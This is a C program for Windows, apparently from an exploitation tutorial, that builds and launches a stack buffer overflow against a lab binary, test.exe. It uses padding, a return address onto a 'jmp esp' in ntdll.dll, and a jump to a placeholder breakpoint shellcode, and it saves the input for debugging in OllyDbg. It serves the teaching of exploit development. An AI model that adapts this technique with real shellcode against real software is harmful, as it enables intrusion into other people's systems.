#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>

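int main(void)
{
    /*
     * Builds the command line for the lab binary test.exe, saves it to
     * exploit.txt (so the same input can be replayed under a debugger) and
     * spawns test.exe with it.  Layout of the command line, as given by the
     * author:
     *
     *                        argv[1]                                                     argv[2]
     *   [20 bytes 'a' x 20] [4 bytes: ret onto a "jmp esp"] [5 bytes: jmp to argv[2]]   [shellcode]
     *
     * Returns 0 on success, 1 when exploit.txt cannot be created or written,
     * the command-line buffer cannot be allocated, or CreateProcess fails.
     * Every resource (file, buffer, process handles) is released on all paths.
     */
    static const char shellcode[] = "\xCC";          /* INT 3 */
    static const char ret[]  = "\xED\x1E\x95\x7C";   /* in ntdll.dll, on a "jmp esp" */
    static const char ret2[] = "\xE9\x5E\x25\x1B";   /* JMP to argv[2]; only 4 bytes, because there is a 00 */
    static const char name[] = "test.exe ";
    enum { PADDING_LEN = 20 };

    int rc = 1;
    char *exploitation = NULL;
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    si.cb = sizeof(si);

    FILE *fp = fopen("exploit.txt", "w");
    if (fp == NULL) {
        perror("fopen(exploit.txt)");
        goto out;
    }

    /* 20 filler bytes, NUL-terminated so it can be formatted with %s. */
    char remplissage[PADDING_LEN + 1];
    memset(remplissage, 'a', PADDING_LEN);
    remplissage[PADDING_LEN] = '\0';

    /* Exact size: +1 for the space separating argv[1] from argv[2], +1 for the NUL. */
    size_t alloc = strlen(name) + strlen(remplissage) + strlen(ret) + strlen(ret2)
                   + 1 + strlen(shellcode) + 1;

    /* Heap buffer rather than a literal: CreateProcess's lpCommandLine must be
     * writable (CreateProcessW may modify it). */
    exploitation = calloc(alloc, 1);
    if (exploitation == NULL) {
        fputs("Allocation failed.\n", stderr);
        goto out;
    }

    /* Each piece is a NUL-terminated string, so %s copies exactly the bytes
     * strcat would have appended.  The NUL that originally ended argv[1] is
     * not a data byte here; the space separator is what splits the arguments. */
    int written = snprintf(exploitation, alloc, "%s%s%s%s %s",
                           name, remplissage, ret, ret2, shellcode);
    if (written < 0 || (size_t)written >= alloc) {
        fputs("Command line truncated.\n", stderr);
        goto out;
    }

    size_t len = strlen(exploitation);
    if (fwrite(exploitation, 1, len, fp) != len) {
        perror("fwrite(exploit.txt)");
        goto out;
    }
    /* Close (and thereby flush) before spawning, and check it: a write error
     * may only surface here.  fp is reset so the cleanup path does not close twice. */
    if (fclose(fp) != 0) {
        perror("fclose(exploit.txt)");
        fp = NULL;
        goto out;
    }
    fp = NULL;

    printf("Exploit 2 - 0vercl0k.blogspot.com.\n\nCreation du processus..\n");
    /* lpApplicationName is NULL, so the module is the first token of the
     * command line ("test.exe"), resolved by CreateProcess's module search;
     * run this from the directory that holds the lab binary. */
    if (!CreateProcess(NULL, exploitation, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        fprintf(stderr, "CreateProcess failed (error %lu).\n", (unsigned long)GetLastError());
        goto out;
    }
    printf("Processus cree.Vous pouvez consulter le fichier exploit.txt pour tester avec ollyDbg.\n");

    /* Only wait on / close handles that CreateProcess actually populated. */
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    rc = 0;

out:
    free(exploitation);
    if (fp != NULL) {
        fclose(fp);
    }
    return rc;
}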